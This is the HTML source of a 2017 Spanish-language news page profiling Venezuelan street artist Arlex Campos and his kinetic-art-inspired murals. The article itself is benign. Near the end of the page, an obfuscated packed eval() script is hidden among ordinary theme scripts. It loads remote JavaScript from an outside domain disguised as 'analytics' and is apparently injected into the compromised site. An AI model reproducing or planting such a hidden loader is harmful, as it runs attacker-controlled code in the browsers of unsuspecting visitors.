        <article id="post-10220" class="post-10220 post type-post status-publish format-standard has-post-thumbnail hentry category-ingeniovenezolano tag-arlex-campos" itemscope itemtype="http://schema.org/Article">



        <header>



            <h1 itemprop="name" class="entry-title">Arlex Campos: Street Art con sello venezolano</h1>


            <div class="meta-info">

                <ul class="td-category"><li class="entry-category"><a  href="http://www.noticias.com.ve/category/ingeniovenezolano/">Ingenio Venezolano</a></li></ul>
                
                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-14T16:58:03+00:00" >14 Agosto, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>
                <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://www.noticias.com.ve/arlex-campos/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-10220">42</span></div>
            </div>

        </header>





        
            <p class="td-sub-title">Los artistas del cinetismo venezolano Jesús Soto y Carlos Cruz Diez han sido inspiración en el Street Art de este tachirense

</p>

        




        <div class="td-post-featured-image"><a href="http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos.jpg" data-caption=""><img width="700" height="366" itemprop="image" class="entry-thumb td-modal-image" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos-700x366.jpg" alt="Arlex Campos" title="Arlex Campos"/></a></div>


        <div class="td-post-text-content">

            <p style="text-align: justify;">Las calles de San Cristóbal fueron su primer lienzo, ahora el artista gráfico <a href="https://www.instagram.com/arlexcampos/?hl=es" target="_blank" rel="noopener noreferrer">Arlex Campos</a> deja sus huellas por latitudes lejanas exaltando siempre la cultura venezolana. Sus obras te hacen pensar en un<strong> Cruz Diez urbano</strong>, pues su técnica le da el sello indistinguible de color e ilusión óptica.</p>
<p style="text-align: justify;"><strong>Desde su niñez se inclinó más por el arte que por la pintura</strong>, así lo ha expresado en entrevistas este artista tachirense. Estudió diseño gráfico, artes plásticas y especializó sus técnicas con talleres de dibujo, en 2011 comenzó a llevar su huella por las paredes de su tierra natal.</p>
<p style="text-align: justify;">Uno de sus primeros íconos en la capital andina fue el mural del futbolista Tomás Rincón, justo en el sector donde el delantero venezolano nació, y es que para Arlex Campos, el arte y el fútbol han sido bastantes cercanos.</p>
<p style="text-align: justify;"><iframe style="-webkit-backface-visibility: hidden; -webkit-transform: scale(1);" src="//gifs.com/embed/a-steve-jobs-arlex-campos-mwAYRr" width="640px" height="360px" frameborder="0" scrolling="no"></iframe></p>
<p style="text-align: justify;">Posteriormente, comenzó a darse a conocer en las calles pero también en festivales artísticos como el Conéctate y Convive, organizado anualmente por la Universidad Católica del Táchira. Allí durante cuatro años hizo su propio nombre hasta llegar a muestras internacionales como el<strong> Festival de Arte de Medellín.</strong></p>
<p style="text-align: justify;">En Medellín se convirtió en el primer venezolano en participar, lo hizo con un mural de la campeona olímpica colombiana Mariana Pajón.</p>
<h6 style="text-align: justify;">Los artistas del cinetismo venezolano Jesús Soto y Carlos Cruz Diez han sido inspiración en el Street Art de este tachirense.</h6>
<p>&nbsp;</p>
<p style="text-align: justify;">Deyna Castellanos, Greivis Vásquez, Miguel Cabrera y otras personalidades venezolanas han sido retratadas por Arlex Campos con su stencil y pintura, pero aunque cuenta con más de 30.000 seguidores se mantiene fiel y sencillo, siempre promoviendo su gentilicio sancristobalense.</p>
<p><a href="http://www.noticias.com.ve/wp-content/uploads/2017/08/streetart-in-Venezuela-by-artist-Arlex-Campos.-Photo-by-miguelchacon16.jpg"><br />
</a><a href="http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c.jpg"><img class="alignnone wp-image-10227 size-full" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c.jpg" alt="" width="745" height="483" srcset="http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c.jpg 745w, http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c-300x194.jpg 300w, http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c-700x454.jpg 700w, http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c-100x65.jpg 100w, http://www.noticias.com.ve/wp-content/uploads/2017/08/deyna_c-551x357.jpg 551w" sizes="(max-width: 745px) 100vw, 745px" /></a></p>
<h4> &#8220;El mundo es un gran lienzo al que le doy color&#8221;</h4>
<h4><a href="http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos.jpg"><img class="alignnone wp-image-10228 size-full" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos.jpg" alt="" width="745" height="483" srcset="http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos.jpg 745w, http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos-300x194.jpg 300w, http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos-700x454.jpg 700w, http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos-100x65.jpg 100w, http://www.noticias.com.ve/wp-content/uploads/2017/08/arlex_campos-551x357.jpg 551w" sizes="(max-width: 745px) 100vw, 745px" /></a></h4>

<!-- Información del autor: nombre, foto, biografía y links a redes sociales  -->

<div class="autor-biografia">

    <div class="autor-info">

        
        <h3 class="autor-nombre">Autor: Katiusa Casanova</h3>

        
</div><!-- .autor-biografia-->


        </div>





        <div class="clearfix"></div>



        <footer>

            
            
            
            
            <div class="td-social-sharing">
                <div class="td-tags-and-social-wrapper-box "> <ul class="td-tags clearfix"><li><span class="td-tag-black">ETIQUETAS</span></li><li><a href="http://www.noticias.com.ve/tag/arlex-campos/">Arlex Campos</a></li></ul></div>
                <div class="td-tags-and-social-wrapper-box td-tags-and-social-wrapper-box-bottom-line">
                    <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Arlex+Campos%3A+Street+Art+con+sello+venezolano&url=http%3A%2F%2Fwww.noticias.com.ve%2Farlex-campos%2F&via=Noticias.com.ve" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" ><div class="td-sp td-sp-share-twitter"></div><div class="td-social-but-text">Twitter</div></a>
                    <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.noticias.com.ve%2Farlex-campos%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-facebook"></div><div class="td-social-but-text">Facebook</div></a>
                    <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.noticias.com.ve/arlex-campos/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-google"></div><div class="td-social-but-text">Google +</div></a>
                    <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.noticias.com.ve/arlex-campos/&amp;media=http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-pinterest"></div><div class="td-social-but-text">Pinterest</div></a>
                </div></div>
            
            <div class="wpb_row row-fluid next-prev"><div class="span6 prev-post"><div><img width="6" class="td-retina" src="http://www.noticias.com.ve/wp-content/themes/Newspaper/images/icons/similar-left.png" alt=""/>Noticias anterior</div><a href="http://www.noticias.com.ve/musicadarte-continua-alzando-voz-benefico-la-fundacion-unos-chamos-ahi/">MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí</a></div></div>
            <div class="author-box-wrap"><a href="http://www.noticias.com.ve/author/noticias/"></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://www.noticias.com.ve/author/noticias/">Katiusa Casanova</a></span></div><div></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>




            <meta itemprop="author" content = "Katiusa Casanova">
        </footer>



    </article> <!-- /.post -->



    <div class="art-img-text-down similar-articles"><h4 class="block-title"><span>NOTICIAS RELACIONADAS</span></h4>

	<div class="wpb_row row-fluid">

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.noticias.com.ve/jason-silva-venezolano-ensena-tecnologia/" rel="bookmark" title="Jason Silva: Un &#8220;tecno filósofo&#8221; venezolano en NatGeo"><img width="326" height="159" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/jason_silva-326x159.jpg" alt="Jason Silva" title="Jason Silva: Un &#8220;tecno filósofo&#8221; venezolano en NatGeo"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/jason-silva-venezolano-ensena-tecnologia/" rel="bookmark" title="Jason Silva: Un &#8220;tecno filósofo&#8221; venezolano en NatGeo">Jason Silva: Un &#8220;tecno filósofo&#8221; venezolano en NatGeo</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-07T17:01:40+00:00" >7 Agosto, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://www.noticias.com.ve/jason-silva-venezolano-ensena-tecnologia/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-10187">351</span></div>        </div>


        <meta itemprop="author" content = "Katiusa Casanova">        </div>

        
	</div> <!-- ./span6 -->

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.noticias.com.ve/una-medicina-venezuela-ingenio-ayuda-al-pais/" rel="bookmark" title="Una Medicina para Venezuela: ingenio que ayuda al país"><img width="326" height="159" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/farmacias-escasez-medicamentos-326x159.jpg" alt="" title="Una Medicina para Venezuela: ingenio que ayuda al país"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/una-medicina-venezuela-ingenio-ayuda-al-pais/" rel="bookmark" title="Una Medicina para Venezuela: ingenio que ayuda al país">Una Medicina para Venezuela: ingenio que ayuda al país</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-07-31T16:12:24+00:00" >31 Julio, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://www.noticias.com.ve/una-medicina-venezuela-ingenio-ayuda-al-pais/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-10130">405</span></div>        </div>


        <meta itemprop="author" content = "Katiusa Casanova">        </div>

        
	</div> <!-- ./span6 --></div><!--./row-fluid--></div>


   

   <div style="margin: 30px 0px 30px 0px"><h1><h2>Comentarios</h2></h1></div>
            
   <div class="fb-comments" data-href="http://www.noticias.com.ve/arlex-campos/" data-num-posts="5" data-colorscheme="light" data-width="100%"></div>
   
   <script>FB.XFBML.parse();</script>
                          <div class="comments" id="comments">
                                                                                                                                            </div> <!-- /.content -->


                </div>
                <div class="span4 column_container td-post-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
                                    <!-- .no sidebar -->
                            </div>
            
                             </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
            <div class="td-footer-wrap">
        <div class="container">
            <div class="row">
                
                            <div class="span12">
                                <div class="td-grid-wrap">
                                    <div class="container-fluid">
                                        <div class="wpb_row row-fluid ">
                                            <div class="span4 wpb_column column_container">
                                                <div class="footer-logo-wrap"><img  class="td-retina-data" src="http://www.noticias.com.ve/wp-content/uploads/2015/12/LOGO-NOTICIAS-300x140_png.png" data-retina="http://noticias.com.ve/wp-content/themes/Newspaper/images/demo/logo-footer-retina.png" alt=""/></div><div class="footer-text-wrap"></div>                                            </div>

                                            <div class="span4 wpb_column column_container">
                                                <script>var block_td_uid_17_5992356a1e9c3 = new td_block();
block_td_uid_17_5992356a1e9c3.id = "td_uid_17_5992356a1e9c3";
block_td_uid_17_5992356a1e9c3.atts = '{"sort":"featured","custom_title":"DESTACADOS","limit":"3","category_id":"","category_ids":"","tag_slug":"","autors_id":"","hide_title":"","installed_post_types":"","offset":"","header_color":"#","header_text_color":"#","custom_url":"","title_style":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","ajax_pagination_infinite_stop":""}';
block_td_uid_17_5992356a1e9c3.td_cur_cat = "";
block_td_uid_17_5992356a1e9c3.td_column_number = "1";
block_td_uid_17_5992356a1e9c3.block_type = "4";
block_td_uid_17_5992356a1e9c3.post_count = "3";
block_td_uid_17_5992356a1e9c3.found_posts = "1693";
block_td_uid_17_5992356a1e9c3.max_num_pages = "565";
block_td_uid_17_5992356a1e9c3.header_color = "#";
block_td_uid_17_5992356a1e9c3.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_17_5992356a1e9c3);
</script><div class="td_block_wrap td_block4"><h4 class="block-title"><span >DESTACADOS</span></h4><style>.ui-sctd_uid_17_5992356a1e9c3 .cur-sub-cat { color:# !important}</style><div id=td_uid_17_5992356a1e9c3 class="td_block_inner">
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.noticias.com.ve/arlex-campos/" rel="bookmark" title="Arlex Campos: Street Art con sello venezolano"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Preview_Tendencia_87_Arlex_Campos-100x65.jpg" alt="Arlex Campos" title="Arlex Campos: Street Art con sello venezolano"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/arlex-campos/" rel="bookmark" title="Arlex Campos: Street Art con sello venezolano">Arlex Campos: Street Art con sello venezolano</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-14T16:58:03+00:00" >14 Agosto, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "Katiusa Casanova">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.noticias.com.ve/musicadarte-continua-alzando-voz-benefico-la-fundacion-unos-chamos-ahi/" rel="bookmark" title="MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/concierto-100x65.jpg" alt="" title="MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/musicadarte-continua-alzando-voz-benefico-la-fundacion-unos-chamos-ahi/" rel="bookmark" title="MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí">MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-14T14:51:06+00:00" >14 Agosto, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "Katiusa Casanova">        </div>

        
        <div class="td_mod3 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.noticias.com.ve/concierto-ladosis-47-beneficio-del-maestro-gerry-weil/" rel="bookmark" title="Concierto LaDosis #47 A beneficio del maestro Gerry Weil"><img width="100" height="65" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Concierto-Ladosis-47b-e1502718915201-100x65.jpg" alt="" title="Concierto LaDosis #47 A beneficio del maestro Gerry Weil"/></a></div>        <div class="item-details">
            <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/concierto-ladosis-47-beneficio-del-maestro-gerry-weil/" rel="bookmark" title="Concierto LaDosis #47 A beneficio del maestro Gerry Weil">Concierto LaDosis #47 A beneficio del maestro Gerry Weil</a></h3>            <div class="meta-info">
                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-08-14T09:55:53+00:00" >14 Agosto, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/>                            </div>
        </div>
        <meta itemprop="author" content = "Katiusa Casanova">        </div>

        </div></div> <!-- ./block1 -->                                            </div>
                                            <div class="span4 wpb_column column_container">
                                                <div class="td_block_wrap td_popular_categories widget widget_categories"><h4 class="block-title"><span >LO MÁS POPULAR</span></h4><ul><li><a href="http://www.noticias.com.ve/category/deportes/">Deportes<span class="td-cat-no">361</span></a></li><li><a href="http://www.noticias.com.ve/category/musica/">Música<span class="td-cat-no">354</span></a></li><li><a href="http://www.noticias.com.ve/category/internacionales/">Internacionales<span class="td-cat-no">286</span></a></li><li><a href="http://www.noticias.com.ve/category/cine/">Cine<span class="td-cat-no">199</span></a></li><li><a href="http://www.noticias.com.ve/category/tecnologia/">Tecnología<span class="td-cat-no">189</span></a></li><li><a href="http://www.noticias.com.ve/category/recetas/">Recetas<span class="td-cat-no">122</span></a></li><li><a href="http://www.noticias.com.ve/category/salud/">Salud<span class="td-cat-no">121</span></a></li></ul></div> <!-- ./block -->                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                                    </div>
        </div>
    </div> <!-- /.td-footer-wrap  -->



<div class="td-sub-footer-wrap">
    <div class="container ">
        <div class="row">
            <div class="span12">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                        <div class="row-fluid ">
                            <div class="span4 td-sub-footer-copy">
                                &copy; Todos los derechos reservados. 2015.                            </div>
                            <div class="span8 td-sub-footer-menu">

                                                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


</div>
<!--/#inner-wrap-->
</div>
<!--/#outer-wrap-->

<div class="td-sp td-scroll-up"></div>



    <!--

        Theme: Newspaper by tagDiv 2014
        Version: 4.6.3 (rara)
        Deploy mode: deploy
        
        uid: 5992356a237b6
    -->

    
            <style type="text/css" media="screen">
                @media screen and (min-width: 992px) {
.menu-item.menu-item-type-post_type.menu-item-object-page.td-no-down-arrow.td-menu-item.td-normal-menu.menu-item-248{
 margin-left: 0; 
  position: absolute;
  right: 54px;
}
}
@media screen and (min-width: 1200px) {
.menu-item.menu-item-type-post_type.menu-item-object-page.td-no-down-arrow.td-menu-item.td-normal-menu.menu-item-248{
	 margin-left: 0; 
  position: absolute;
  right: 88px;
}

.home-seccion-align-vertical-hijo
{
padding-top: 12px;
    vertical-align: middle;
   }
}

.author-box-wrap {
display:none;
}

                </style><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))</script><link rel='stylesheet' id='mystyle-css'  href='http://www.noticias.com.ve/wp-content/plugins/comments-facebook/css/style.css?ver=4.7.5' type='text/css' media='all' />
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"loaderUrl":"http:\/\/www.noticias.com.ve\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","recaptcha":{"messages":{"empty":"Por favor, prueba que no eres un robot."}},"sending":"Enviando..."};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.5'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201733'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/themes/Newspaper/js/td_external.js?ver=4.6.3'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-content/themes/Newspaper/js/full_compact/site.js?ver=4.6.3'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-includes/js/wp-embed.min.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://www.noticias.com.ve/wp-includes/js/comment-reply.min.js?ver=4.7.5'></script>

<!-- JS generated by theme -->

<script>
    
</script>

<script type='text/javascript' src='http://stats.wp.com/e-201733.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.3.1',blog:'36519427',post:'10220',tz:'-4.5',srv:'www.noticias.com.ve'} ]);
	_stq.push([ 'clickTrackerInit', '36519427', '10220' ]);
</script>
</body>
</html>